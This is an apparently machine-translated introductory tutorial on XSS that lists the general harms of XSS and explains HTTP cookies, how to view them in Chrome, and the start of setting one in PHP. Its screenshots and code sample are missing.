[In-depth study of Web security] in-depth use of XSS vulnerabilities and in-depth study of xss

[In-depth study of Web security] in-depth use of XSS vulnerabilities and in-depth study of xss

Preface

Starting from this lesson, Xiaozhai has changed the layout again, hoping to give you a better reading experience. The basic principle of XSS is HTML code injection. In this lesson, we will take a deeper look at How To Exploit XSS.

Analysis on XSS Exploitation Technology

What can XSS do?

Before learning the XSS exploitation technology, we need to know what XSS can do? Or what harm is there:

· Tamper with the page and modify the page content

· Phishing

· Stealing user cookies

· Hijack user (browser) sessions

· Advertising and traffic refreshing

· DDoS

· Webpage Trojans

· Obtain client information (such as UA, IP, and open port)

· Spread XSS Worm

......

These are all what XSS can do (of course, some are also subject to the XSS environment ).

What is a Cookie?

Before learning about XSS, let's take a look at what browser cookies are. We need to talk about the HTTP protocol first when talking about cookies. Let's first think about the C/S architecture program. Generally, the Client is connected to the Server. After the communication is complete, the connection is disconnected.

However, the HTTP protocol is different. The client is a browser. Communication is performed every time an HTTP request is sent and an HTTP response is received. Each request is a request and a response, that is, when the request is sent to the end of the request, it is the communication process. When the request is sent, It is disconnected.

As we know, many Web programs have logon functions, that is, user identity recognition. However, every time a request is responded, the process ends. How can a website manage user sessions? How does a website authenticate users?

It is verified by using this Cookie that each time the browser initiates an HTTP request, it will carry the Cookie header, and the Cookie is set with the set-cookie in each response.

To sum up what we have mentioned above, it is concise: HTTP connections are stateless connections, so cookies must be used to authenticate user identities.

We can use the following method on Chrome to view our cookies on the website:

1. Access "chrome: // settings /":

2. There is a "show advanced settings..." at the bottom. CLICK:

3. There is a "Privacy Setting ":

4. There is a "Content Setting" button under the title. Click here:

 

5. Click the "all cookies and website data..." button to view the cookies on all websites:

 

Cookie exists in the form of Key = Value, just like:

 

Every time we access a domain, the browser will write the cookies in this domain in the Cookie header of the HTTP request to access this domain. When a domain wants to set cookies for us, it needs to be written in the set-Cookie header in the HTTP response.

How to Set cookies in PHP

Start The apache2 service and go to the Web root directory to create a cookietest. php file. The Code is as follows:

 

Visit the page in a browser:

 

Right-click on the page and choose review elements:

 

Find the Network on the horizontal bar, refresh the page, and find an HTTP request under the Network:

 

Click the request:

 

You can see a cookie in the bar. CLICK:

 

We can now see the Cookie contained in the HTTP request and the Cookie set in the HTTP response.